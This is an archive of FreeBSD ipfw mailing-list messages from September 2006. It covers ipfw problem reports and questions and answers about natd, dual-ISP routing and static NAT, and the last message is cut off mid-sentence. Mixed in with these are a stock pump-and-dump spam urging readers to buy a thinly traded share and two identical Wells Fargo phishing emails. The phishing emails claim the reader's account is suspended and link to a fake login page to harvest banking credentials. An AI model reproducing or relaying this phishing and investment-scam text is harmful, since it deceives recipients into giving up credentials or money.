From owner-freebsd-ipfw@FreeBSD.ORG Sun Sep 3 22:37:04 2006 Return-Path: X-Original-To: freebsd-ipfw@hub.freebsd.org Delivered-To: freebsd-ipfw@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6078216A4DD; Sun, 3 Sep 2006 22:37:04 +0000 (UTC) (envelope-from simon@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 070EC43D46; Sun, 3 Sep 2006 22:37:04 +0000 (GMT) (envelope-from simon@FreeBSD.org) Received: from freefall.freebsd.org (simon@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.4/8.13.4) with ESMTP id k83Mb395020074; Sun, 3 Sep 2006 22:37:03 GMT (envelope-from simon@freefall.freebsd.org) Received: (from simon@localhost) by freefall.freebsd.org (8.13.4/8.13.4/Submit) id k83Mb1k7020070; Sun, 3 Sep 2006 22:37:01 GMT (envelope-from simon) Date: Sun, 3 Sep 2006 22:37:01 GMT From: "Simon L. Nielsen" Message-Id: <200609032237.k83Mb1k7020070@freefall.freebsd.org> To: simon@nitro.dk, simon@FreeBSD.org, freebsd-ipfw@FreeBSD.org Cc: Subject: Re: kern/49086: [ipfw] [patch] Make ipfw2 log to different syslog priorities X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 03 Sep 2006 22:37:04 -0000 Synopsis: [ipfw] [patch] Make ipfw2 log to different syslog priorities State-Changed-From-To: open->closed State-Changed-By: simon State-Changed-When: Sun Sep 3 22:34:37 UTC 2006 State-Changed-Why: Close PR since this clearly hasn't been very interesting for other people, and personally I don't have need for this functionality anymore, so there is no reason to keep the PR around. http://www.freebsd.org/cgi/query-pr.cgi?pr=49086 From owner-freebsd-ipfw@FreeBSD.ORG Mon Sep 4 02:48:53 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E7F5C16A4ED; Mon, 4 Sep 2006 02:48:52 +0000 (UTC) (envelope-from hpptihw@flying.to) Received: from flying.to (59-114-244-178.dynamic.hinet.net [59.114.244.178]) by mx1.FreeBSD.org (Postfix) with SMTP id 7C2F843D6B; Mon, 4 Sep 2006 02:48:46 +0000 (GMT) (envelope-from hpptihw@flying.to) Date: Mon, 04 Sep 2006 10:48:43 +0800 From: "sjxcm hjznjl" X-Sender: hpptihw@flying.to To: , , , , Message-Id: <4914081603.UBRnzT-35107863-8802@flying.to> MIME-Version: 1.0 Content-Type: text/plain Cc: Subject: Powerhouse Gains Possible in SmallCaps SBNS X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 04 Sep 2006 02:48:53 -0000 See what it feels to pick the right Stock for a change Watch this one like a HAWK come tuesday SHALLBETTER INDUSTRIES INC (SBNS. PK) Company: SHALLBETTER INDUSTRIES INC Symbol: SBNS. PK Current Price: .98 Expected: Steady Climb for the TOP This quick rising stock is a good long term winner. This stock is going high due to superb business solutions and creative partnerships in thebusiness world. Below is the companys most recent headline. Shallbetter Industries, Inc. Announces New President HONOLULU--(BUSINESS WIRE)--Aug. 28, 2006--Shallbetter Industries Inc. is pleased to announce the appointment of a new President and Corporate Finance Group. Mr. Bruce Pridmore B.Sc. M.B.A has been retained as Shallbetter's new President and Chief Financial Officer. Mr. Pridmore is the founding Partner of London Asia Capital Canada and past Executive Director of Pacific Asia for the National Research Council of Canada. Mr. Pridmore brings extensive knowledge of Asian business practices as well as comprehensive understanding of capital markets both in North America and throughout the European Economic Community. Mr. Pridmore will assume the day to day operation of the company and the organization of a new drilling program once additional capital has been raised. It is anticipated the additional capital will be raised by way of debt, equity or a combination thereof. Dont miss the boat, this is a new issue, is thinly traded and could move up quickly. We anticipate that shares of SBNS will be much higher in the short-term. ACT ON IT! About SHALLBETTER INDUSTRIES INC Shallbetter Industries Inc is an international mining company with operations focused in Mongolia. Shallbetter has been granted exclusive government mining rights to many highly sought after mining locations. Having exclusive rights to land rich with gold in regions of the world that are fairly inexpensive in labor makes the profit outlook of many Shallbetter projects very alluring to investors. Shallbetter seeks to carry out highly profitable projects with the utmost in environmental and social responsibility in mind. All projects are given due diligence in research before conclusions are made as to accurate projections of profitability and feasibility. Any of the above statements with respect to the future predications or goals and events may be seen as only Foward speculation and nothing else. All information inside this email pertaining to any sort of financial advice need to be understood as just information and not any real advice. None of the information above can be constructed as any sort of financial advice. Confidentiality Statemen Once you see you'll know why you cannot afford to be left out of this one ----------------------- Sow dry and set wet. There may be snow on the roof, but there's fire in the belly. Rare as walking on water. When it rains it pours. Shit happens. Spring to mind. The sun will shine into our yard to. The sun will shine into our yard to. There may be snow on the roof, but there's fire in the belly. You can't teach an old dog new tricks. Stone cold sober. You have to separate the chaff from the wheat. Till the cows come home. Tools of the trade. Stand your ground. We'll cross that bridge when we come to it. To rule the mountains is to rule the river. Watered down. Were you born in a barn? Save it for a rainy day. You throw filth on the living and flowers on the dead.Pin a rose on your nose. Still water runs dirty and deep. That's a real stem winder. Sow dry and set wet. We hung them out to dry. A rolling stone gathers no moss. Spring to mind. Ugly as a mud fence. Raking it in. You reap what you sow. The way to a man's heart is through his stomach. A thorn in my side. Putting it in a nutshell. Slow as molasses in January. A weed is no more than a flower in disguise. When pigs fly. Till the cows come home. The stronger the breeze the stronger the trees. Welcome to my garden. So hungry I could eat a horse. You say potayto, I say potahto. Sow much, reap much; sow little, reap little. Speak softly and carry a big stick. Useless as tits on bull. From owner-freebsd-ipfw@FreeBSD.ORG Mon Sep 4 11:08:31 2006 Return-Path: X-Original-To: freebsd-ipfw@FreeBSD.org Delivered-To: freebsd-ipfw@FreeBSD.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2D10D16A4E1 for ; Mon, 4 Sep 2006 11:08:31 +0000 (UTC) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id D5D5043D45 for ; Mon, 4 Sep 2006 11:08:30 +0000 (GMT) (envelope-from owner-bugmaster@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.4/8.13.4) with ESMTP id k84B8Uot094405 for ; Mon, 4 Sep 2006 11:08:30 GMT (envelope-from owner-bugmaster@FreeBSD.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.13.4/8.13.4/Submit) id k84B8T3U094397 for freebsd-ipfw@FreeBSD.org; Mon, 4 Sep 2006 11:08:29 GMT (envelope-from owner-bugmaster@FreeBSD.org) Date: Mon, 4 Sep 2006 11:08:29 GMT Message-Id: <200609041108.k84B8T3U094397@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: linimon set sender to owner-bugmaster@FreeBSD.org using -f From: FreeBSD bugmaster To: freebsd-ipfw@FreeBSD.org Cc: Subject: Current problem reports assigned to you X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 04 Sep 2006 11:08:31 -0000 Current FreeBSD problem reports Critical problems Serious problems S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/51274 ipfw [ipfw] [patch] ipfw2 create dynamic rules with parent f kern/51341 ipfw [ipfw] [patch] ipfw rule 'deny icmp from any to any ic o kern/73910 ipfw [ipfw] serious bug on forwarding of packets after NAT o kern/74104 ipfw [ipfw] ipfw2/1 conflict not detected or reported, manp o conf/78762 ipfw [ipfw] [patch] /etc/rc.d/ipfw should excecute $firewal o bin/80913 ipfw [patch] /sbin/ipfw2 silently discards MAC addr arg wit o kern/88659 ipfw [modules] ipfw and ip6fw do not work properly as modul o kern/93300 ipfw ipfw pipe lost packets o kern/95084 ipfw [ipfw] [patch] IPFW2 ignores "recv/xmit/via any" (IPFW o kern/97504 ipfw [ipfw] IPFW Rules bug o kern/97951 ipfw [ipfw] [patch] ipfw does not tie interface details to o kern/98831 ipfw [ipfw] ipfw has UDP hickups o bin/102422 ipfw [patch] ipfw & kernel problems where firewall rules ar o kern/102471 ipfw [ipfw] [patch] add tos and dscp support 14 problems total. Non-critical problems S Tracker Resp. Description -------------------------------------------------------------------------------- a kern/26534 ipfw [ipfw] Add an option to ipfw to log gid/uid of who cau o kern/46159 ipfw [ipfw] [patch] ipfw dynamic rules lifetime feature o kern/48172 ipfw [ipfw] [patch] ipfw does not log size and flags o bin/50749 ipfw [ipfw] [patch] ipfw2 incorrectly parses ports and port o kern/55984 ipfw [ipfw] [patch] time based firewalling support for ipfw o kern/60719 ipfw [ipfw] Headerless fragments generate cryptic error mes o kern/69963 ipfw [ipfw] install_state warning about already existing en o kern/71366 ipfw [ipfw] "ipfw fwd" sometimes rewrites destination mac a o kern/72987 ipfw [ipfw] ipfw/dummynet pipe/queue 'queue [BYTES]KBytes ( o kern/73276 ipfw [ipfw] [patch] ipfw2 vulnerability (parser error) o bin/78785 ipfw [ipfw] [patch] ipfw verbosity locks machine if /etc/rc o kern/80642 ipfw [ipfw] [patch] ipfw small patch - new RULE OPTION o kern/82724 ipfw [ipfw] [patch] Add setnexthop and defaultroute feature o kern/86957 ipfw [ipfw] [patch] ipfw mac logging o kern/87032 ipfw [ipfw] [patch] ipfw ioctl interface implementation o kern/91847 ipfw [ipfw] ipfw with vlanX as the device o kern/93422 ipfw ipfw divert rule no longer works in 6.0 (regression) o bin/95146 ipfw [ipfw][patch]ipfw -p option handler is bogus 18 problems total. From owner-freebsd-ipfw@FreeBSD.ORG Mon Sep 4 16:57:46 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6DDD916A4DD for ; Mon, 4 Sep 2006 16:57:46 +0000 (UTC) (envelope-from DBila@care.org.mz) Received: from gate.care.org.mz (cust251-2.netcabo.co.mz [196.46.2.251]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5ACB143D45 for ; Mon, 4 Sep 2006 16:57:45 +0000 (GMT) (envelope-from DBila@care.org.mz) Received: from gate.care.org.mz (localhost.care.org.mz [127.0.0.1]) by gate.care.org.mz (Postfix) with ESMTP id 9BE2E61C67 for ; Mon, 4 Sep 2006 19:29:54 +0200 (CAT) Received: from care.org.mz (unknown [192.168.40.60]) by gate.care.org.mz (Postfix) with ESMTP id 7E63561C53 for ; Mon, 4 Sep 2006 19:29:54 +0200 (CAT) Received: from WorldClient by care.org.mz (MDaemon.PRO.v8.0.3.R) with ESMTP id md50000259371.msg for ; Mon, 04 Sep 2006 18:58:15 +0200 Received: from [192.168.40.130] via WorldClient with HTTP; Mon, 04 Sep 2006 18:58:14 +0200 Date: Mon, 04 Sep 2006 18:58:14 +0200 From: "David Bila" To: freebsd-ipfw@freebsd.org MIME-Version: 1.0 Message-ID: X-Mailer: WorldClient 8.0.3 X-Authenticated-Sender: DBila@care.org.mz X-Spam-Processed: mail.care.org.mz, Mon, 04 Sep 2006 18:58:15 +0200 (not processed: spam filter disabled) X-MDRemoteIP: 127.0.0.1 X-Return-Path: DBila@care.org.mz X-MDaemon-Deliver-To: freebsd-ipfw@freebsd.org X-MDAV-Processed: mail.care.org.mz, Mon, 04 Sep 2006 18:58:16 +0200 X-Virus-Scanned: ClamAV using ClamSMTP Content-Type: text/plain X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: Two ISP connections with Natd X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 04 Sep 2006 16:57:46 -0000 Dear All, I am running freebsd as getway for my office. I Just acquired second Internet last week. I wonder if there is a way trhough route add -net and ipfw I can manipulate my traffic in a such way that some traffic to a selected network can go through one ISP while the rest goes through the default gateway. I am using natd and my FreeBSD box has got 3 NICs, one for internal network and other two for each ISP. Please Help, David From owner-freebsd-ipfw@FreeBSD.ORG Tue Sep 5 03:10:43 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5F8B916A4DE for ; Tue, 5 Sep 2006 03:10:43 +0000 (UTC) (envelope-from wwwrun@h5497.serverkompetenz.net) Received: from h5497.serverkompetenz.net (nickeys.de [81.169.174.238]) by mx1.FreeBSD.org (Postfix) with ESMTP id 73E7043D53 for ; Tue, 5 Sep 2006 03:10:41 +0000 (GMT) (envelope-from wwwrun@h5497.serverkompetenz.net) Received: by h5497.serverkompetenz.net (Postfix, from userid 30) id 76108865B7C; Tue, 5 Sep 2006 05:02:20 +0200 (CEST) To: freebsd-ipfw@freebsd.org From: WellsFargo Online Content-Transfer-Encoding: 8bit Message-Id: <20060905030220.76108865B7C@h5497.serverkompetenz.net> Date: Tue, 5 Sep 2006 05:02:20 +0200 (CEST) MIME-Version: 1.0 Content-Type: text/plain X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: Urgent Action : Your Account Has Been Suspended X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 05 Sep 2006 03:10:43 -0000 [logo_62sq.gif] [coach.gif] Dear valued WellsFargo member: Due to concerns, for the safety and integrity of the wellsfargo account we have issued this warning message We have noticed that your Wells Fargo online account needs to be updated onceagain, please enteryour online account information, because we haveto verify all of the online accounts after we have updated our Wells FargoOnline Banking site. To verify your online account and access your bank account, please click on the link below: [1][al_continue_off.gif] [2]Continue to Stop Payment This e-mail was sent to all of our Wells Fargo customers. Recently, we have found that manyaccounts were hacked. For furtherinformation, please contact our Customer Services. Consumer Credit Card Services: Customer Service: 1-800-642-4720 Application Status: 1-800-967-9521 Security Issues: Phone: 415-623-7706 Fax: 415-544-0826 Email: [3]myershh@wellsfargo.com Sincerely, Wells FargoMember Services Team Thank You [4]About Wells Fargo | [5]Employment | [6]Report Email Fraud | [7]Privacy, Security & Legal | [8]Home 1995 - 2006 Wells Fargo. All rights reserved. References 1. http://www.piles.gr/themes/piles/images/.sec/www.wellsfargo.com/updateyouracount/index.html?wellsfargo.comlogin.uersr 2. http://www.piles.gr/themes/piles/images/.sec/www.wellsfargo.com/updateyouracount/index.html?wellsfargo.comlogin.uersr 3. http://mail.yahoo.com/config/login?/ym/Compose?To=myershh@wellsfargo.com 4. http://www.wellsfargo.com/about/about.jhtml 5. http://www.wellsfargo.com/employment 6. http://www.wellsfargo.com/privacy_security/email_fraud/report.jhtml 7. http://www.wellsfargo.com/privacy_security/index.jhtml 8. http://www.wellsfargo.com/ From owner-freebsd-ipfw@FreeBSD.ORG Tue Sep 5 03:12:07 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 76BCD16A720 for ; Tue, 5 Sep 2006 03:12:07 +0000 (UTC) (envelope-from wwwrun@h5497.serverkompetenz.net) Received: from h5497.serverkompetenz.net (nickeys.de [81.169.174.238]) by mx1.FreeBSD.org (Postfix) with ESMTP id DF1DC43D46 for ; Tue, 5 Sep 2006 03:12:06 +0000 (GMT) (envelope-from wwwrun@h5497.serverkompetenz.net) Received: by h5497.serverkompetenz.net (Postfix, from userid 30) id 1F7F986687C; Tue, 5 Sep 2006 05:04:34 +0200 (CEST) To: freebsd-ipfw@freebsd.org From: WellsFargo Online Content-Transfer-Encoding: 8bit Message-Id: <20060905030434.1F7F986687C@h5497.serverkompetenz.net> Date: Tue, 5 Sep 2006 05:04:34 +0200 (CEST) MIME-Version: 1.0 Content-Type: text/plain X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: Urgent Action : Your Account Has Been Suspended X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 05 Sep 2006 03:12:07 -0000 [logo_62sq.gif] [coach.gif] Dear valued WellsFargo member: Due to concerns, for the safety and integrity of the wellsfargo account we have issued this warning message We have noticed that your Wells Fargo online account needs to be updated onceagain, please enteryour online account information, because we haveto verify all of the online accounts after we have updated our Wells FargoOnline Banking site. To verify your online account and access your bank account, please click on the link below: [1][al_continue_off.gif] [2]Continue to Stop Payment This e-mail was sent to all of our Wells Fargo customers. Recently, we have found that manyaccounts were hacked. For furtherinformation, please contact our Customer Services. Consumer Credit Card Services: Customer Service: 1-800-642-4720 Application Status: 1-800-967-9521 Security Issues: Phone: 415-623-7706 Fax: 415-544-0826 Email: [3]myershh@wellsfargo.com Sincerely, Wells FargoMember Services Team Thank You [4]About Wells Fargo | [5]Employment | [6]Report Email Fraud | [7]Privacy, Security & Legal | [8]Home 1995 - 2006 Wells Fargo. All rights reserved. References 1. http://www.piles.gr/themes/piles/images/.sec/www.wellsfargo.com/updateyouracount/index.html?wellsfargo.comlogin.uersr 2. http://www.piles.gr/themes/piles/images/.sec/www.wellsfargo.com/updateyouracount/index.html?wellsfargo.comlogin.uersr 3. http://mail.yahoo.com/config/login?/ym/Compose?To=myershh@wellsfargo.com 4. http://www.wellsfargo.com/about/about.jhtml 5. http://www.wellsfargo.com/employment 6. http://www.wellsfargo.com/privacy_security/email_fraud/report.jhtml 7. http://www.wellsfargo.com/privacy_security/index.jhtml 8. http://www.wellsfargo.com/ From owner-freebsd-ipfw@FreeBSD.ORG Wed Sep 6 00:33:32 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4ABB916A4FB for ; Wed, 6 Sep 2006 00:33:32 +0000 (UTC) (envelope-from Kirk.Davis@epsb.ca) Received: from Exchange22.EDU.epsb.ca (exchange22.epsb.ca [198.161.119.187]) by mx1.FreeBSD.org (Postfix) with ESMTP id B32D043D53 for ; Wed, 6 Sep 2006 00:33:31 +0000 (GMT) (envelope-from Kirk.Davis@epsb.ca) Received: from Exchange21.EDU.epsb.ca ([10.0.5.118]) by Exchange22.EDU.epsb.ca with Microsoft SMTPSVC(6.0.3790.1830); Tue, 5 Sep 2006 18:33:30 -0600 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-MimeOLE: Produced By Microsoft Exchange V6.5 Date: Tue, 5 Sep 2006 18:33:30 -0600 Message-ID: <04C71268DFDAA8499EC1A248A44B6A2B05976127@Exchange21.EDU.epsb.ca> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Two ISP connections with Natd Thread-Index: AcbQRCwoSlLQjw6DQme9Ko3baAe7bgBB0rKw From: "Kirk Davis" To: , X-OriginalArrivalTime: 06 Sep 2006 00:33:30.0911 (UTC) FILETIME=[13F3EAF0:01C6D14C] Cc: Subject: FW: Two ISP connections with Natd X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 06 Sep 2006 00:33:32 -0000 > >Dear All, >=20 >I am running freebsd as getway for my office. I Just acquired second Internet last week. I wonder if there >is a way trhough route add -net and ipfw I can manipulate my traffic in a such way that some traffic to a >selected network can go through one ISP while the rest goes through the default gateway. I am using natd and my FreeBSD box has got 3 NICs, one for internal network and other two for each ISP. Yes, This can be done. If you are using ipfw and natd then you have to run two instances of natd (on separate ports), one on each external interface. The ipfw firewall rules get a little tricky but you have to create rules to catch the incomming and outgoing traffic through each external interface and direct it to the right instance of natd. Once this is done then just direct your routes out the interface that you want. ---- Kirk =20 From owner-freebsd-ipfw@FreeBSD.ORG Wed Sep 6 19:17:55 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1B12E16A4E1 for ; Wed, 6 Sep 2006 19:17:55 +0000 (UTC) (envelope-from mike@surfglobal.net) Received: from ms5.surfglobal.net (ms5.surfglobal.net [64.30.60.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id CF78943D78 for ; Wed, 6 Sep 2006 19:17:30 +0000 (GMT) (envelope-from mike@surfglobal.net) Received: from localhost (localhost [127.0.0.1]) by ms5.surfglobal.net (Postfix) with ESMTP id E210C19842D for ; Wed, 6 Sep 2006 15:33:05 -0400 (EDT) X-Virus-Scanned: by Amavisd-new at surfglobal.net Received: from ms5.surfglobal.net ([127.0.0.1]) by localhost (ms5.surfglobal.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id u817Yu6DBpwe for ; Wed, 6 Sep 2006 15:33:05 -0400 (EDT) Received: from Laptop (unknown [64.30.60.20]) by ms5.surfglobal.net (Postfix) with ESMTP id 9AF3719841A for ; Wed, 6 Sep 2006 15:33:05 -0400 (EDT) From: "Mike Thompson" To: Date: Wed, 6 Sep 2006 15:16:22 -0400 Message-ID: <002e01c6d1e8$f0b772d0$4602a8c0@Laptop> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.6626 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2962 Importance: Normal Subject: IPFW and natd X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 06 Sep 2006 19:17:55 -0000 I have clients connecting behind a firewall on 10.xxx.xxx.xxx ip's. The external ip is on a 208.xxx.xxx.xxx block. I need to assign certain = clients behind the firewall their own static external ip that is accessible from = the outside and also make sure they go out using this ip. I have been = unable to get this to work. I have the firewall working fine with natd. Any help would greatly be appreciated. Thanks Mike GlobalNet From owner-freebsd-ipfw@FreeBSD.ORG Wed Sep 6 19:41:33 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 656B116A4E1 for ; Wed, 6 Sep 2006 19:41:33 +0000 (UTC) (envelope-from vladone@spaingsm.com) Received: from mail.spaingsm.com (llwb135.servidoresdns.net [217.76.137.82]) by mx1.FreeBSD.org (Postfix) with ESMTP id 79E2943D62 for ; Wed, 6 Sep 2006 19:41:29 +0000 (GMT) (envelope-from vladone@spaingsm.com) Received: from localhost (unknown [88.158.112.6]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (No client certificate requested) by mail.spaingsm.com (Postfix) with ESMTP id A1FF924C67A for ; Wed, 6 Sep 2006 20:58:48 +0200 (CEST) Date: Wed, 6 Sep 2006 22:41:35 +0300 From: vladone X-Mailer: The Bat! (v3.80.03) Professional X-Priority: 3 (Normal) Message-ID: <525121136.20060906224135@spaingsm.com> To: ipfw@freebsd.org In-Reply-To: <002e01c6d1e8$f0b772d0$4602a8c0@Laptop> References: <002e01c6d1e8$f0b772d0$4602a8c0@Laptop> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Cc: Subject: Re: IPFW and natd X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: vladone List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 06 Sep 2006 19:41:33 -0000 Hello Mike, Wednesday, September 6, 2006, 10:16:22 PM, you wrote: > I have clients connecting behind a firewall on 10.xxx.xxx.xxx ip's. The > external ip is on a 208.xxx.xxx.xxx block. I need to assign certain clients > behind the firewall their own static external ip that is accessible from the > outside and also make sure they go out using this ip. I have been unable to > get this to work. I have the firewall working fine with natd. Any help > would greatly be appreciated. > Thanks > Mike > GlobalNet > _______________________________________________ > freebsd-ipfw@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw > To unsubscribe, send any mail to > "freebsd-ipfw-unsubscribe@freebsd.org" Use redirect_address option in natd.conf to assign ip's and option "unregistered_only yes", to do natd only for private classes. Example natd.conf (asuming that xl0 is public interface) use_sockets yes same_ports yes interface xl0 dynamic yes unregistered_only yes redirect_address 192.168.0.10 208.xxx.xxx.xxx ............................................. -- Best regards, vladone mailto:vladone@spaingsm.com From owner-freebsd-ipfw@FreeBSD.ORG Wed Sep 6 19:56:28 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 636A016A4DA for ; Wed, 6 Sep 2006 19:56:28 +0000 (UTC) (envelope-from vladone@spaingsm.com) Received: from mail.spaingsm.com (llwb135.servidoresdns.net [217.76.137.82]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9DF1143D46 for ; Wed, 6 Sep 2006 19:56:27 +0000 (GMT) (envelope-from vladone@spaingsm.com) Received: from localhost (unknown [88.158.112.6]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (No client certificate requested) by mail.spaingsm.com (Postfix) with ESMTP id 1CCB324C67A for ; Wed, 6 Sep 2006 21:13:46 +0200 (CEST) Date: Wed, 6 Sep 2006 22:56:34 +0300 From: vladone X-Mailer: The Bat! (v3.80.03) Professional X-Priority: 3 (Normal) Message-ID: <1902833769.20060906225634@spaingsm.com> To: ipfw@freebsd.org In-Reply-To: <04C71268DFDAA8499EC1A248A44B6A2B05976127@Exchange21.EDU.epsb.ca> References: <04C71268DFDAA8499EC1A248A44B6A2B05976127@Exchange21.EDU.epsb.ca> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Cc: Subject: Re: FW: Two ISP connections with Natd X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: vladone List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 06 Sep 2006 19:56:28 -0000 Hello Kirk, Wednesday, September 6, 2006, 3:33:30 AM, you wrote: >> >>Dear All, >> >>I am running freebsd as getway for my office. I Just acquired second > Internet last week. I wonder if there >is a way trhough route add -net > and ipfw I can manipulate my traffic in a such way that some traffic to a >>selected network can go through one ISP while the rest goes through > the default gateway. I am using natd and my FreeBSD box has got 3 NICs, > one for internal network and other two for each ISP. > Yes, This can be done. If you are using ipfw and natd then you have to > run two instances of natd (on separate ports), one on each external > interface. The ipfw firewall rules get a little tricky but you have to > create rules to catch the incomming and outgoing traffic through each > external interface and direct it to the right instance of natd. Once > this is done then just direct your routes out the interface that you > want. > ---- Kirk > > _______________________________________________ > freebsd-ipfw@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ipfw > To unsubscribe, send any mail to > "freebsd-ipfw-unsubscribe@freebsd.org" Read this : http://www.mail-archive.com/freebsd-ipfw@freebsd.org/msg00642.html -- Best regards, vladone mailto:vladone@spaingsm.com From owner-freebsd-ipfw@FreeBSD.ORG Thu Sep 7 11:02:33 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D353D16A4DD for ; Thu, 7 Sep 2006 11:02:33 +0000 (UTC) (envelope-from if@hetzner.co.za) Received: from hetzner.co.za (office.cpt2.host-h.net [196.7.147.230]) by mx1.FreeBSD.org (Postfix) with ESMTP id 605FD43D46 for ; Thu, 7 Sep 2006 11:02:33 +0000 (GMT) (envelope-from if@hetzner.co.za) Received: from localhost ([127.0.0.1] helo=ian.hetzner.africa) by hetzner.co.za with esmtp (Exim 4.62 (FreeBSD)) (envelope-from ) id 1GLHeP-000EgY-Ne for freebsd-ipfw@freebsd.org; Thu, 07 Sep 2006 13:02:29 +0200 To: freebsd-ipfw@freebsd.org From: Ian FREISLICH X-Attribution: BOFH Date: Thu, 07 Sep 2006 13:02:29 +0200 Message-Id: Subject: Synchronising state across multiple firewalls X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 07 Sep 2006 11:02:33 -0000 Hi I was wondering if anyone here had plans to write a firewall state 